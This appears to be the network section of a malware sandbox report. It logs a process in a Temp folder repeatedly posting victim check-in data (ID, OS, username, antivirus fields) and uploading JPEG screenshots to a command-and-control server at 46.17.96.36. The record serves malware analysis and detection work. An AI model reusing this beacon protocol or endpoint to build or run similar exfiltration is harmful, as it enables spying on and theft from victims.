                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:54.579510927 CEST16381OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:54.657860041 CEST16382INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        261192.168.2.45000046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:54.906678915 CEST16383OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:54.983223915 CEST16472INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        262192.168.2.45000146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:54.907196045 CEST16383OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:54.907332897 CEST16383OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:54.907476902 CEST16393OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:54.907576084 CEST16396OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:54.942648888 CEST16399OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:54.942698002 CEST16402OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:54.942738056 CEST16404OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:54.942981005 CEST16416OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:54.943023920 CEST16419OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:54.943146944 CEST16422OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:28:54.978055000 CEST16424OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:55.117701054 CEST16492INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        263192.168.2.45000246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:55.221076012 CEST16493OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:55.295752048 CEST16493INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        264192.168.2.45000346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:55.441293001 CEST16494OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:55.441390038 CEST16494OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:55.441571951 CEST16504OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:55.441653013 CEST16507OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:55.476720095 CEST16509OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:55.476780891 CEST16515OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:55.477005959 CEST16523OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:55.477155924 CEST16527OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:28:55.477178097 CEST16532OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:55.511687994 CEST16535OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:55.511740923 CEST16543OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:55.614825964 CEST16602INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        265192.168.2.45000446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:55.514736891 CEST16583OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:55.590384960 CEST16602INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        266192.168.2.45000546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:55.960549116 CEST16603OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:56.036463022 CEST16690INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:56 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        267192.168.2.45000646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:55.963399887 CEST16603OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:55.963515043 CEST16604OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:55.963649988 CEST16614OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:55.963761091 CEST16616OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:55.998702049 CEST16619OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:55.998765945 CEST16627OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:55.999264002 CEST16642OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:28:56.035413980 CEST16644OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:56.035463095 CEST16647OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:56.035518885 CEST16660OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:56.035551071 CEST16663OUTData Raw: 50 67 ce f8 cd 30 83 9e 6b e8 e5 f0 d6 88 07 fc 82 ed 7f ef 8a f3 3f 89 9a 7d 9d 95 cd 97 d9 2d a2 83 72 36 e1 18 c6 79 aa 85 5e 77 60 92 e5 3c 8e 93 14 99 a5 15 c6 7a 07 a6 fc 0d e3 c6 b7 bf f6 0e 7f fd 19 1d 7b ad f3 e2 df 1f de 60 3f af f4 af
                                        Data Ascii: Pg0k?}-r6y^w`<z{`?t}fA4;;;]> x!GVP)F{0T]Il;j|~)k%o1)qIJ+,)i3@4uR)<:s^Q_YH;x~^S
                                        Aug 29, 2021 22:28:56.142438889 CEST16712INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:56 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        268192.168.2.45000746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
